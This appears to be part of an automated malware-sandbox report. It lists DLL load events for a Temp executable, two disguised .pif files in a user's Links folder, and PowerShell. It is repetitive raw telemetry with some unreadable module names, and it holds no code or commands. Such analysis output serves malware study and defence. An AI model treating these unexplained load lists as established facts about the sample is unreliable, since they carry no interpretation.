Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: uxtheme.dll
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: mscoree.dll
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: wldp.dll
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: amsi.dll
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: userenv.dll
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: profapi.dll
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: version.dll
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: msasn1.dll
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: gpapi.dll
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: cryptsp.dll
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: rsaenh.dll
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: cryptbase.dll
Source: C:\Users\user\Links\icqplewR.pif	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
